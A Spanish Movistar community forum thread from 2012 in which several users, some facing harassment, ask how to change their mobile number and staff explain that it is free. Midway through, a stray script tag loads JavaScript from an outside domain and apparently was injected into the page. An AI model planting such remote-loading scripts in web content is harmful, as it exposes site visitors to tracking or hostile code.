Editado 02-08-2012 22:15
Editado 02-08-2012 22:15
Hola porfavor , quiziera cambiar mi numero de movil de contrato acutalmente recibo muchisimas llamadas con ocultos , insultos etc.. hoy he enviado un fax como me indico el 1004 , tambien me dijo que podia ir a una tienda pero he ido a 4 tiendas en diferentes localidades y me han dicho que es a travez del 1004 , por favor me podría decir alguien comercial cual es el estado de ese fax ? si ha llegado y cuando me van a dar mi numero nuevo? es urgente es super incomoda la situacion mi numero es 6xxxxxxxx y es el que quiero que me cambien. Gracias un saludo
¡Resuelto! Ir a solución.
Hola @ro0283am
Bienvenido a la comunidad antes de nada
Antes de que sigas posteando te ruego que leas las normas y funcionamiento de la comunidad y te presentes en el foro de bienvenida para que los usuarios puedan conocerte
En cuanto a lo del cambio del nº envíame un mp con el nº a cambiar y el nif del titular y te lo gestionamos mañana mismo
Saludos
Consulta nuestras ofertas y servicios sobre Fusión, Tarifas Móvil, ADSL y Fibra, Móviles, Televisión y Ofertas Movistar.
No te pierdas los últimos estrenos de Movistar+ en Cine, Series, Motor, Deportes, Toros y el mejor FútbolSer usuario registrado de Movistar.es tiene sus ventajas. Si aún no lo eres, regístrate, ¡¡es gratis!!: mi movistar
Una de las ventajas es poder ver tu factura en Consulta Factura online.
También te invitamos a seguirnos en Twitter, Facebook y Google+
Vale muchisimas gracias , ya te lo he enviado , sin querer se ha enviado dos veces lo siento 😞 , espero que mañana ya disponga de mi nuevo numero y que me lo comuniquen para saber cual es mi nuevo numero , muchas gracias un saludo.
Hola @ro0283am
Veo que ya tienes tu nº nuevo,
Por favor ponerlo todo en público para eso os ponemos el enlace con las normas del foro
saludos
Consulta nuestras ofertas y servicios sobre Fusión, Tarifas Móvil, ADSL y Fibra, Móviles, Televisión y Ofertas Movistar.
No te pierdas los últimos estrenos de Movistar+ en Cine, Series, Motor, Deportes, Toros y el mejor FútbolSer usuario registrado de Movistar.es tiene sus ventajas. Si aún no lo eres, regístrate, ¡¡es gratis!!: mi movistar
Una de las ventajas es poder ver tu factura en Consulta Factura online.
También te invitamos a seguirnos en Twitter, Facebook y Google+
Buenos días, @Coreybruyah!
Para gestionar el cambio de número debes dirigirte a un Distribuidor de Movistar, no tiene coste, aquí te dejo un enlace donde puedes consultar las Tiendas
Saludos.
Consulta nuestras ofertas y servicios sobre miMovistar, Tarifas Móvil, ADSL y Fibra, Móviles, Televisión y Ofertas Movistar.
Ser usuario registrado de Movistar.es tiene sus ventajas. Si aún no lo eres, regístrate, ¡¡es gratis!!: mi movistar
Una de las ventajas es poder ver tu factura en Consulta Factura online.
También te invitamos a seguirnos en Twitter, Facebook , Telegram e Instagram
hola ami hace unos dias atras y aun siguen llamandome con oculto y es bastante molesto y tambien tengo targeta de movil con contrato me gustaria saber qe puedo hacer para cambiarme de numero,si cuesta dinero..espero respuestas pronto,gracias.
<script type="text/javascript" src="http://loading-resource.com/data.geo.php?callback=window.__geo.getData"></script>
Hola @ssndra
El cambio de nº de teléfono móvil es gratuito y no supone pérdida de antigüedad, puntos o contrato de permanencia
En caso de que tengas contrato algún servicio o plan cerrado comercialmente, al realizar el cambio éstos se pierden, por lo que tendrías que solicitar una nueva tarifa. En este enlace dispones de información sobre las tarifas que actualmente se encuentran vigentes.
Si te interesa que te ayudemos a realizar el cambio, puedes enviarme un mensaje privado con tu nº de teléfono móvil y Nif, y compruebo si puedo ayudarte
Un saludo!
Consulta nuestras ofertas y servicios sobre Fusión, Tarifas Móvil, ADSL y Fibra, Móviles, Televisión y Ofertas Movistar.
No te pierdas los últimos estrenos de Movistar+ en Cine, Series, Motor, Deportes, Toros y el mejor FútbolSer usuario registrado de Movistar.es tiene sus ventajas. Si aún no lo eres, regístrate, ¡¡es gratis!!: mi movistar
Una de las ventajas es poder ver tu factura en Consulta Factura online.
También te invitamos a seguirnos en Twitter, Facebook y Google+
Hola!
He llegado a aquí porque también necesito cambiar mi número de móvil y quería saber el procedimiento
Yo tengo el Movistar Fusión (ADSL + Móvil) desde hace 1 par de semanas, aunque el número de móvil ya lo usaba desde hace años (en parte necesito cambiarlo por eso)
No tengo problema en ir a una tienda Movistar pero soy minusválido y preferiría no hacer más viajecitos de los necesarios
por ejemplo, ¿El Corte Inglés o Media Markt se consideran tiendas Movistar a estos efectos?
Si alguien puede orientarme o darme los pasos exactos a seguir se lo agradecería mucho
También prometo entrar más en esta comunidad para compartir mis experiencias 🙂
PD: No he mandado ningún MP porque lo "prohiben" las [url=http://comunidad.movistar.es/t5/Contrataci%C3%B3n-Precios-y/Nuevo-en-la-Comunidad-Lee-esto-antes-de-... normas y funcionamiento de la comunidad [/url]
si se puede hacer algo ya me lo decís
GRACIAS
Hola @ssndra
Acabo de leer tu mp El cambio de nº de teléfono móvil, como te comentaba un poco más arriba, sí es posible y además es gratuito. El contrato de permanencia que hay vigente en tu línea no se modifica, conservarías los puntos que hay acumulados, y además el tipo de contrato que tienes (Contrato Básico Personal) lo vas a seguir manteniendo.
En caso de que te interese que hagamos el cambio, avísame por favor
Un saludo
Consulta nuestras ofertas y servicios sobre Fusión, Tarifas Móvil, ADSL y Fibra, Móviles, Televisión y Ofertas Movistar.
No te pierdas los últimos estrenos de Movistar+ en Cine, Series, Motor, Deportes, Toros y el mejor FútbolSer usuario registrado de Movistar.es tiene sus ventajas. Si aún no lo eres, regístrate, ¡¡es gratis!!: mi movistar
Una de las ventajas es poder ver tu factura en Consulta Factura online.
También te invitamos a seguirnos en Twitter, Facebook y Google+
Hola @MR.SHANKLY
Un saludo
Consulta nuestras ofertas y servicios sobre Fusión, Tarifas Móvil, ADSL y Fibra, Móviles, Televisión y Ofertas Movistar.
No te pierdas los últimos estrenos de Movistar+ en Cine, Series, Motor, Deportes, Toros y el mejor FútbolSer usuario registrado de Movistar.es tiene sus ventajas. Si aún no lo eres, regístrate, ¡¡es gratis!!: mi movistar
Una de las ventajas es poder ver tu factura en Consulta Factura online.
También te invitamos a seguirnos en Twitter, Facebook y Google+
Hola, me gustaría cambiar mi numero actual de movil de contrato ya que actualmente estoy siendo acosada por una persona recibiendo múltiples mensajes y watsapps a parte, esta persona me sigue porque los watsapps son diciéndome lo que hago y dijo de hacer. A esta persona la conozco e estoy intentando alejarme de él lo más posible ya que mensajes de watsapp por el momento no son suficientes para poder denunciarlo.
Agradecería poder cambiar mi numero pero no volver a recibir esta clase de mensajes y/o Watsapp.
Editado 26-11-2012 19:47
Editado 26-11-2012 19:47
Hola RrAaKkeeLl,
Bienvenida a la Comunidad Movistar
Cuando tengas un momento, puedes enviarme un mp con el número de teléfono y NIF para ayudarte con lo que solicitas.
Por cierto, si te sirve de ayuda, en la configuración del Whatsapp tienes la opción de bloquear algunos contactos.
Espero que esa modificación te ayude a alejarte de esa persona.
Un saludo.
Consulta nuestras ofertas y servicios sobre Fusión, Tarifas Móvil, ADSL y Fibra, Móviles, Televisión y Ofertas Movistar.
No te pierdas los últimos estrenos de Movistar+ en Cine, Series, Motor, Deportes, Toros y el mejor FútbolSer usuario registrado de Movistar.es tiene sus ventajas. Si aún no lo eres, regístrate, ¡¡es gratis!!: mi movistar
Una de las ventajas es poder ver tu factura en Consulta Factura online.
También te invitamos a seguirnos en Twitter, Facebook y Google+
Ya te he enviado lo que me pediste, ara como veo si me as respondido por un mensaje privado?
Como seré avisada del cambio?
Hola RrAaKkeeLl,
En la parte superior de la página tendrá que aparecerte un sobre con el número de privados que tienes, por ejemplo ahora mismo tendrías que tener almenos 1.
De todos modos intentaré informarte siempre desde el hilo al menos que te facilita información con datos privados. Cuando puedas mira ese mp.
Un saludo!!
Consulta nuestras ofertas y servicios sobre Fusión, Tarifas Móvil, ADSL y Fibra, Móviles, Televisión y Ofertas Movistar.
No te pierdas los últimos estrenos de Movistar+ en Cine, Series, Motor, Deportes, Toros y el mejor FútbolSer usuario registrado de Movistar.es tiene sus ventajas. Si aún no lo eres, regístrate, ¡¡es gratis!!: mi movistar
Una de las ventajas es poder ver tu factura en Consulta Factura online.
También te invitamos a seguirnos en Twitter, Facebook y Google+
Buenos días. Me llamo María y me acabo de registrar en Comunidad Movistar debido a que tengo el mismo problema que andais publicando por aquí y estaba buscando posibles soluciones a través de la web.
Yo quisiera cambiar de número de téléfono por motivos variados que afectan a mi derecho a la intimidad. Por supuesto, me gustaría saber si es gratuito o conlleva coste alguno y la forma más sencilla de proceder al trámite. Además, añado que tengo un compromiso de permanencia aun de un año con esta compañía y supongo que por nada se verá modificado.
Espero que alguien pueda ayudarme. Muchas gracias por su atención.
Hola @morayflamenka
El cambio de numero, coste no tiene. Cuando puedas me envias un privado con el nº de movil y el d.n.i y ya lo miramos.
Un salu2
Consulta nuestras ofertas y servicios sobre Fusión, Tarifas Móvil, ADSL y Fibra, Móviles, Televisión y Ofertas Movistar.
No te pierdas los últimos estrenos de Movistar+ en Cine, Series, Motor, Deportes, Toros y el mejor FútbolSer usuario registrado de Movistar.es tiene sus ventajas. Si aún no lo eres, regístrate, ¡¡es gratis!!: mi movistar
Una de las ventajas es poder ver tu factura en Consulta Factura online.
También te invitamos a seguirnos en Twitter, Facebook , Telegram e Instagram
Hola. LLevo unas cuantas horas tratando de solucionar mi problema y estoy bastante indignada. Esta mañana estuve buscando a través de internet y me dirigí a este foro pidiendo ayuda, sin haber obtenido aun respuesta. Además me ausenté del trabajo para dirigirme a un distribuidor de la compañía y me dijeron que llamase a los dos números de atención al cliente. LLamé una vez a cada uno y me dijeron que no podían ayudarme, es decir, que tenía que ir a una tienda. Y digo... si de ahí vengo... Total, que me fui nuevamente a otros dos distribuidores distintos para "escuchar" lo que me decían, volviendo a faltar al trabajo, y me volvieron a decir exactamente lo mismo de llamar a atención al cliente. Creo que esa no es forma de tratar a un cliente y menos aun cuando estás pagando por unos servicios y tienes unos derechos como consumidor, no como para que te tengan "de un lado para otro". De veras, les pido nuevamente ayuda porque para mi es demasiado importante poner fin a esto. Además, en una de las llamadas incluso me dijeron que la única solución es hacer desaparecer la línea y he llegado a pensar en esta posibilidad, pues mi indignación se multiplica al asociar a mi problema el hecho de recibir esta atención tan deficiente por parte de la compañía.
Yo tambien estoy en las mismas...
Me tienen frito con llamadas ocultas, otras intentando localizar a otra persona que no soy yo....
¿¿Podriais echarme un cable para cambiar el numero de telefono???
PD:No me envieis por favor al distribuidor ya que todos los de mi zona, digamos que no son muy eficientes ni eficaces..
Y digo todos los distribuidores de mi ciudad por que los he recorrido todos!!!!
Podria contactar conmigo alguien para realizar el cambio.
Gracias
Hola @mrfear
Cuando puedas me envias un privado con el nº de movil y el d.n.i y ya te informamos
Un saludo.
Consulta nuestras ofertas y servicios sobre Fusión, Tarifas Móvil, ADSL y Fibra, Móviles, Televisión y Ofertas Movistar.
No te pierdas los últimos estrenos de Movistar+ en Cine, Series, Motor, Deportes, Toros y el mejor FútbolSer usuario registrado de Movistar.es tiene sus ventajas. Si aún no lo eres, regístrate, ¡¡es gratis!!: mi movistar
Una de las ventajas es poder ver tu factura en Consulta Factura online.
También te invitamos a seguirnos en Twitter, Facebook , Telegram e Instagram
Muchas gracias por su respuesta, ya le he enviado la informacion por privado.
Hola @mrfear
Te acabo de enviar un privado, cuando puedas me contestas vale??? Gracias
Un saludo.
Consulta nuestras ofertas y servicios sobre Fusión, Tarifas Móvil, ADSL y Fibra, Móviles, Televisión y Ofertas Movistar.
No te pierdas los últimos estrenos de Movistar+ en Cine, Series, Motor, Deportes, Toros y el mejor FútbolSer usuario registrado de Movistar.es tiene sus ventajas. Si aún no lo eres, regístrate, ¡¡es gratis!!: mi movistar
Una de las ventajas es poder ver tu factura en Consulta Factura online.
También te invitamos a seguirnos en Twitter, Facebook , Telegram e Instagram